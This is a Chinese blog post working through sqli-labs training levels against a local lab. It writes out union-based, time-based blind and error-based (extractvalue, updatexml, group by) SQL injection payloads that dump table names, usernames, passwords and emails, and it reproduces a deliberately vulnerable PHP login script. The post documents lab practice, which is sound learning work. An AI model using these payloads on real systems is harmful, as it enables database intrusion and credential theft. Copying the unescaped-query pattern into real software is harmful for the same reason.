<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="The Redefine Team">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://3143047748.github.io/2023/03/13/sqli-labs/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="less-03知道需要闭合什么符号，比如这关闭合是**’)**  爆出有哪些位置可以进行输出数据 1&#39;) order by 3--+ 查看数据库名字 1&#39;) union select 1,2,database()--+ 爆破表名： -1&#39;) union select 1,2,group_concat(table_name) FROM information_schema">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-labs">
<meta property="og:url" content="http://3143047748.github.io/2023/03/13/sqli-labs/index.html">
<meta property="og:site_name" content="n0rt6&#39;s bolg">
<meta property="og:description" content="less-03知道需要闭合什么符号，比如这关闭合是**’)**  爆出有哪些位置可以进行输出数据 1&#39;) order by 3--+ 查看数据库名字 1&#39;) union select 1,2,database()--+ 爆破表名： -1&#39;) union select 1,2,group_concat(table_name) FROM information_schema">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/c20c6ec4119c4561a4426a6ea998b3f6.png">
<meta property="article:published_time" content="2023-03-13T11:38:28.000Z">
<meta property="article:modified_time" content="2023-07-22T05:42:03.275Z">
<meta property="article:author" content="n0rt6">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/c20c6ec4119c4561a4426a6ea998b3f6.png">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/redefine-favicon.svg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/redefine-favicon.svg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/redefine-favicon.svg">
    <!--- Page Info-->
    
    <title>
        
            sqli-labs -
        
        Theme Redefine
    </title>
    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/fonts.css">

    
<link rel="stylesheet" href="/fonts/Satoshi/satoshi.css">

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">

    <!--- Font Part-->
    
    
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    window.config = {"hostname":"3143047748.github.io","root":"/","language":"zh-CN","path":"search.xml"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":true,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"Theme Redefine","subtitle":{"text":[],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.5.0","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="swup-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container">
    
    <div class="navbar-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                Theme Redefine
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        首页
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer w-full absolute top-0 left-0 bg-background-color">
        <ul class="drawer-navbar-list flex flex-col justify-start items-center">
            
                
                    <li class="drawer-navbar-item text-base my-1.5 flex justify-center items-center">
                        <a class="rounded-3xl py-1.5 px-5 hover:border hover:!text-primary active:!text-primary group " 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                首页
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container">
    <div class="article-content-container">

        <div class="article-title">
            
                <h1 class="article-title-regular">sqli-labs</h1>
            
            </div>
            
                    
        
        
            <div class="article-header flex flex-row gap-2 items-center">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="/images/redefine-avatar.svg">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">The Redefine Team</span>
                        
                            <span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv4</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-03-13 19:38:28</span>
        <span class="mobile">2023-03-13 19:38:28</span>
        <span class="hover-info">创建</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-07-22 13:42:03</span>
            <span class="mobile">2023-07-22 13:42:03</span>
            <span class="hover-info">更新</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/sqli-labs/">sqli-labs</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/CTF/">CTF</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fa-regular fa-typewriter"></i>&nbsp;<span>1.8k 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fa-regular fa-clock"></i>&nbsp;<span>8 分钟</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body">
            <meta name="referrer" content="no-referrer"/>

<h2 id="less-03"><a href="#less-03" class="headerlink" title="less-03"></a>less-03</h2><p>知道需要闭合什么符号，比如这关闭合是**’)**</p>
<blockquote>
<p>爆出有哪些位置可以进行输出数据 <code>1&#39;) order by 3--+</code></p>
<p>查看数据库名字 <code>1&#39;) union select 1,2,database()--+</code></p>
<p>爆破表名： <code>-1&#39;) union select 1,2,group_concat(table_name) FROM information_schema.tables where table_schema=database()--+</code></p>
<p>爆破列名： <code>1&#39;) union select 1,2,group_concat(column_name) FROM information_schema.columns where table_schema=database() and table_name=&#39;users&#39;--+</code></p>
<p>爆破数据： <code>1&#39;) union select 1,2,group_concat(id,username,password) FROM users--+</code></p>
</blockquote>
<h2 id="less-04"><a href="#less-04" class="headerlink" title="less -04"></a>less -04</h2><p>遇上题不同的是这次闭合是**”)**</p>
<h2 id="less-9-时间盲注"><a href="#less-9-时间盲注" class="headerlink" title="less-9(时间盲注)"></a>less-9(时间盲注)</h2><p>无回显，采用<strong>时间盲注</strong>判断对错<br> <strong>注意：</strong><br> 采用时间盲注时配合if语句可以知道前边的闭合符号是什么，就这题来说采用<code>if(1=2,1,sleep(2))--+</code><br>意思就是前边<strong>1&#x3D;2</strong>如果正确，便会执行1，否则执行sleep(2)。<strong>sleep(2)<strong>意思就是延缓两秒，这样通过时间就可以判断出我们前边必和符号使用的对错情况。<br>本题加载<code>http://localhost:1000/sqli-labs/Less-9/?id=-1&#39; or if(1=2,1,sleep(2))--+</code>可以发现延缓两秒才输出结果，说明此语句正确，也就是闭合符号使用正确。我们要多试几次，并不是一次就能判断出的。<br><strong>判断数据库名</strong><br>欧克，下面更麻烦，由于主页面不会报错，并且只输出</strong>You are in………..<strong>那么就一个一个爆破，找到数据库有多少字符也就是</strong>?id&#x3D;1’ and if(length(database())&gt;8,sleep(2),0) –+<strong>如果大于8，就延缓2秒正常运行，否则正常运行。经过测试发现数据库名长度为8.<br>长度知道了再爆破具体名字</strong>?id&#x3D;1’ and if(ascii(substr(database(),1,1))&#x3D;115,sleep(2),1)–+</strong><br>此为判断第一个字母的ascii码是否为115，最终找到<strong>security</strong><br><strong>判断表名</strong></p>
<p><code>?id=1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit x,y),z,d))=e,sleep(1),0)–+</code></p>
<blockquote>
<p>其中x代表第x+1个表，y表示第x+1往后y个单位的表，z表示第几个字母，d表示z往后d个单位的字母</p>
</blockquote>
<p><strong>判断列名</strong></p>
<p><code>?id=1’ and If(ascii(substr((select column_name from information_schema.columns where table_name=‘users’ and table_schema=database() limit x,y),z,d))=105,sleep(2),1)–+</code></p>
<blockquote>
<p>x：第x+1个列，y：x+1个列往后y个单位，z：x+1列的第一个字母，d：第一个字母往后的第z个单位</p>
</blockquote>
<p>最后爆数据。</p>
<h2 id="less-10"><a href="#less-10" class="headerlink" title="less 10"></a>less 10</h2><p>闭合符号为**”**</p>
<h2 id="less11"><a href="#less11" class="headerlink" title="less11"></a>less11</h2><p>输入<code>-1&#39; or 1=1#</code>正常返回，查列。<br><code>admin&#39; order by 2#</code>回显<code>admin&#39; order by 3#</code>报错<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://img-blog.csdnimg.cn/c20c6ec4119c4561a4426a6ea998b3f6.png"
                      alt="1"
                ><br>欧克，接下来正常操作。</p>
<h2 id="less-17"><a href="#less-17" class="headerlink" title="less 17"></a>less 17</h2><p>分析源码</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token comment">//including the Mysql connect parameters.</span>
<span class="token keyword">include</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"../sql-connections/sql-connect.php"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">error_reporting</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">function</span> <span class="token function-definition function">check_input</span><span class="token punctuation">(</span><span class="token variable">$value</span><span class="token punctuation">)</span>
	<span class="token punctuation">&#123;</span>
	<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token keyword">empty</span><span class="token punctuation">(</span><span class="token variable">$value</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
		<span class="token punctuation">&#123;</span>
		<span class="token comment">// truncation (see comments)</span>
		<span class="token variable">$value</span> <span class="token operator">=</span> <span class="token function">substr</span><span class="token punctuation">(</span><span class="token variable">$value</span><span class="token punctuation">,</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token number">15</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//截取账户前15的字符</span>
		<span class="token punctuation">&#125;</span>

		<span class="token comment">// Stripslashes if magic quotes enabled</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">get_magic_quotes_gpc</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token comment">/*get_magic_quotes_gpc()
判断该函数是否被打开，若该函数被打开，会转义  单引号（'）双引号（"）反斜杠（\）空字符（\0）
换行符（\n）
回车符（\r）
水平制表符（\t）
垂直制表符（\x0B）
*/</span>
			<span class="token punctuation">&#123;</span>
			<span class="token variable">$value</span> <span class="token operator">=</span> <span class="token function">stripslashes</span><span class="token punctuation">(</span><span class="token variable">$value</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//删除反斜杠</span>
			<span class="token punctuation">&#125;</span>

		<span class="token comment">// Quote if not a number</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">ctype_digit</span><span class="token punctuation">(</span><span class="token variable">$value</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
			<span class="token punctuation">&#123;</span>
			<span class="token variable">$value</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"'"</span> <span class="token operator">.</span> <span class="token function">mysql_real_escape_string</span><span class="token punctuation">(</span><span class="token variable">$value</span><span class="token punctuation">)</span> <span class="token operator">.</span> <span class="token string double-quoted-string">"'"</span><span class="token punctuation">;</span><span class="token comment">//mysql_real_escape_string：转义字符</span>
			<span class="token punctuation">&#125;</span>
		
	<span class="token keyword">else</span>
		<span class="token punctuation">&#123;</span>
		<span class="token variable">$value</span> <span class="token operator">=</span> <span class="token function">intval</span><span class="token punctuation">(</span><span class="token variable">$value</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
	<span class="token keyword">return</span> <span class="token variable">$value</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>

<span class="token comment">// take the variables</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'uname'</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'passwd'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token punctuation">&#123;</span>
<span class="token comment">//making sure uname is not injectable</span>
<span class="token variable">$uname</span><span class="token operator">=</span><span class="token function">check_input</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'uname'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  

<span class="token variable">$passwd</span><span class="token operator">=</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'passwd'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>


<span class="token comment">//logging the connection parameters to a file for analysis.</span>
<span class="token variable">$fp</span><span class="token operator">=</span><span class="token function">fopen</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'result.txt'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'a'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">fwrite</span><span class="token punctuation">(</span><span class="token variable">$fp</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'User Name:'</span><span class="token operator">.</span><span class="token variable">$uname</span><span class="token operator">.</span><span class="token string double-quoted-string">"\n"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">fwrite</span><span class="token punctuation">(</span><span class="token variable">$fp</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'New Password:'</span><span class="token operator">.</span><span class="token variable">$passwd</span><span class="token operator">.</span><span class="token string double-quoted-string">"\n"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">fclose</span><span class="token punctuation">(</span><span class="token variable">$fp</span><span class="token punctuation">)</span><span class="token punctuation">;</span>


<span class="token comment">// connectivity </span>
@<span class="token variable">$sql</span><span class="token operator">=</span><span class="token string double-quoted-string">"SELECT username, password FROM users WHERE username= <span class="token interpolation"><span class="token variable">$uname</span></span> LIMIT 0,1"</span><span class="token punctuation">;</span>

<span class="token variable">$result</span><span class="token operator">=</span><span class="token function">mysql_query</span><span class="token punctuation">(</span><span class="token variable">$sql</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//查询语句</span>
<span class="token variable">$row</span> <span class="token operator">=</span> <span class="token function">mysql_fetch_array</span><span class="token punctuation">(</span><span class="token variable">$result</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//mysql_fetch_array() 函数从结果集中取得一行作为关联数组，或数字数组，或二者兼有返回根据从结果集取得的行生成的数组，如果没有更多行则返回 false。</span>
<span class="token comment">//echo $row;</span>
	<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$row</span><span class="token punctuation">)</span>
	<span class="token punctuation">&#123;</span>
  		<span class="token comment">//echo '&lt;font color= "</span><span class="token comment">#0000ff">';	</span>
		<span class="token variable">$row1</span> <span class="token operator">=</span> <span class="token variable">$row</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'username'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>  	
		<span class="token comment">//echo 'Your Login name:'. $row1;</span>
		<span class="token variable">$update</span><span class="token operator">=</span><span class="token string double-quoted-string">"UPDATE users SET password = '<span class="token interpolation"><span class="token variable">$passwd</span></span>' WHERE username='<span class="token interpolation"><span class="token variable">$row1</span></span>'"</span><span class="token punctuation">;</span>
		<span class="token function">mysql_query</span><span class="token punctuation">(</span><span class="token variable">$update</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  		<span class="token keyword">echo</span> <span class="token string double-quoted-string">"&lt;br>"</span><span class="token punctuation">;</span>
	
	
	
		<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">mysql_error</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
		<span class="token punctuation">&#123;</span>
			<span class="token keyword">echo</span> <span class="token string single-quoted-string">'&lt;font color= "#FFFF00" font size = 3 >'</span><span class="token punctuation">;</span>
			<span class="token function">print_r</span><span class="token punctuation">(</span><span class="token function">mysql_error</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//******************************</span>
			<span class="token keyword">echo</span> <span class="token string double-quoted-string">"&lt;/br>&lt;/br>"</span><span class="token punctuation">;</span>
			<span class="token keyword">echo</span> <span class="token string double-quoted-string">"&lt;/font>"</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
		<span class="token keyword">else</span>
		<span class="token punctuation">&#123;</span>
			<span class="token keyword">echo</span> <span class="token string single-quoted-string">'&lt;font color= "#FFFF00" font size = 3 >'</span><span class="token punctuation">;</span>
			<span class="token comment">//echo " You password has been successfully updated " ;		</span>
			<span class="token keyword">echo</span> <span class="token string double-quoted-string">"&lt;br>"</span><span class="token punctuation">;</span>
			<span class="token keyword">echo</span> <span class="token string double-quoted-string">"&lt;/font>"</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
	
		<span class="token keyword">echo</span> <span class="token string single-quoted-string">'&lt;img src="../images/flag1.jpg"   />'</span><span class="token punctuation">;</span>	
		<span class="token comment">//echo 'Your Password:' .$row['password'];</span>
  		<span class="token keyword">echo</span> <span class="token string double-quoted-string">"&lt;/font>"</span><span class="token punctuation">;</span>
	


  	<span class="token punctuation">&#125;</span>
	<span class="token keyword">else</span>  
	<span class="token punctuation">&#123;</span>
		<span class="token keyword">echo</span> <span class="token string single-quoted-string">'&lt;font size="4.5" color="#FFFF00">'</span><span class="token punctuation">;</span>
		<span class="token comment">//echo "Bug off you Silly Dumb hacker";</span>
		<span class="token keyword">echo</span> <span class="token string double-quoted-string">"&lt;/br>"</span><span class="token punctuation">;</span>
		<span class="token keyword">echo</span> <span class="token string single-quoted-string">'&lt;img src="../images/slap1.jpg"   />'</span><span class="token punctuation">;</span>
	
		<span class="token keyword">echo</span> <span class="token string double-quoted-string">"&lt;/font>"</span><span class="token punctuation">;</span>  
	<span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>学到三种报错注入：</p>
<h3 id="extractvalue报错注入"><a href="#extractvalue报错注入" class="headerlink" title="extractvalue报错注入"></a>extractvalue报错注入</h3><p>extractvalue(XML_document,XPath_string)</p>
<p>第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc</p>
<p>第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法。</p>
<p>作用：从XML_document中提取符合XPATH_string的值，当我们XPath_string语法报错时候就会报错，下面的语法就是错误的。concat和group_concat作用一样<code>0x5c</code>是<code>\\</code>的16进制.</p>
<blockquote>
<p>1’ and (extractvalue(1,concat(0x5c,version(),0x5c)))#    爆版本<br>1’ and (extractvalue(1,concat(0x5c,database(),0x5c)))#   爆数据库<br>1’ and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()),0x5c)))#   爆表名<br>1’ and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;’users’),0x5c)))#<br>爆字段名<br>1’ and (extractvalue(1,concat(0x5c,(select password from (select password from users where username&#x3D;’admin1’) b) ,0x5c)))#      爆字段内容该格式针对mysql数据库。<br>1’ and (extractvalue(1,concat(0x5c,(select group_concat(username,password) from users),0x5c)))#                      爆字段内容。</p>
</blockquote>
<p>在最后一步爆字段内容时候，会报错，原因是<strong>mysql数据不支持查询和更新是同一张表</strong>。所以我们需要加一个<strong>中间表。</strong></p>
<h3 id="updatexml报错注入"><a href="#updatexml报错注入" class="headerlink" title="updatexml报错注入"></a>updatexml报错注入</h3><p>UPDATEXML (XML_document, XPath_string, new_value)</p>
<p>第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc</p>
<p>第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。</p>
<p>第三个参数：new_value，String格式，替换查找到的符合条件的数据</p>
<p>作用：改变文档中符合条件的节点的值，改变XML_document中符合XPATH_string的值</p>
<blockquote>
<p>123’ and (updatexml(1,concat(0x5c,version(),0x5c),1))#     爆版本<br>123’ and (updatexml(1,concat(0x5c,database(),0x5c),1))#    爆数据库</p>
</blockquote>
<blockquote>
<p>123’ and (updatexml(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()),0x5c),1))#      爆表名<br>123’ and (updatexml(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema&#x3D;’security’ and table_name &#x3D;’users’),0x5c),1))#<br>爆字段名</p>
</blockquote>
<blockquote>
<p>123’ and (updatexml(1,concat(0x5c,(select password from (select password from users where username&#x3D;’admin1’) b),0x5c),1))#<br>爆密码该格式针对mysql数据库。<br>爆其他表就可以，下面是爆emails表<br>123’ and (updatexml(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema&#x3D;’security’ and table_name &#x3D;’emails’),0x5c),1))#</p>
</blockquote>
<blockquote>
<p>1’ and (updatexml (1,concat(0x5c,(select group_concat(id,email_id) from emails),0x5c),1))#   爆字段内容。</p>
</blockquote>
<h3 id="group-by报错注入"><a href="#group-by报错注入" class="headerlink" title="group by报错注入"></a>group by报错注入</h3><blockquote>
<p>123’ and (select count(*) from information_schema.tables group by concat(database(),0x5c,floor(rand(0)<em>2)))#     爆数据库<br>123’ and (select count(</em>) from information_schema.tables group by concat(version(),0x5c,floor(rand(0)*2)))#      爆数据库版本</p>
</blockquote>
<blockquote>
<p>1’ and (select count(*) from information_schema.tables where table_schema&#x3D;database() group by concat(0x7e,(select table_name from information_schema.tables where table_schema&#x3D;database() limit 1,1),0x7e,floor(rand(0)<em>2)))#    通过修改limit后面数字一个一个爆表<br>1’ and (select count(</em>) from information_schema.tables where table_schema&#x3D;database() group by concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()),0x7e,floor(rand(0)*2)))#        爆出所有表</p>
</blockquote>
<blockquote>
<p>1’ and (select count(*) from information_schema.columns where table_schema&#x3D;database() group by concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;’users’),0x7e,floor(rand(0)<em>2)))#    爆出所有字段名<br>1’ and (select count(</em>) from information_schema.columns group by concat(0x7e,(select group_concat(username,password) from users),0x7e,floor(rand(0)*2)))#    爆出所有字段名</p>
</blockquote>
<blockquote>
<p>1’ and (select 1 from(select count(*) from information_schema.columns where table_schema&#x3D;database() group by concat(0x7e,(select password from users where username&#x3D;’admin1’),0x7e,floor(rand(0)*2)))a)#    爆出该账户的密码。</p>
</blockquote>

        </div>

        
            <div class="post-copyright-info">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>标题:</strong> sqli-labs</li>
        <li><strong>作者:</strong> The Redefine Team</li>
        <li><strong>创建于
                :</strong> 2023-03-13 19:38:28</li>
        
            <li>
                <strong>更新于
                    :</strong> 2023-07-22 13:42:03
            </li>
        
        <li>
            <strong>链接:</strong> https://redefine.ohevan.com/2023/03/13/sqli-labs/
        </li>
        <li>
            <strong>
                版权声明:
            </strong>
            
            本文章采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0</a> 进行许可。
            

        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box">
                
                    <li class="tag-item">
                        <a href="/tags/CTF/">#CTF</a>&nbsp;
                    </li>
                
            </ul>
        

        

        
            <div class="article-nav">
                
                    <div class="article-prev">
                        <a class="prev"
                        rel="prev"
                        href="/2023/03/16/SQL%E6%B3%A8%E5%85%A5%E4%B9%8BHandler%E5%91%BD%E4%BB%A4%E5%92%8C%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5/"
                        >
                            <span class="left arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-left"></i>
                            </span>
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">SQL注入之Handler命令和堆叠注入</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next">
                        <a class="next"
                        rel="next"
                        href="/2023/03/11/PortSwigger-XXE/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">PortSwigger-XXE</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
            <div class="comment-container">
                <div class="comments-container pjax">
    <div id="comment-anchor"></div>
    <div class="comment-area-title">
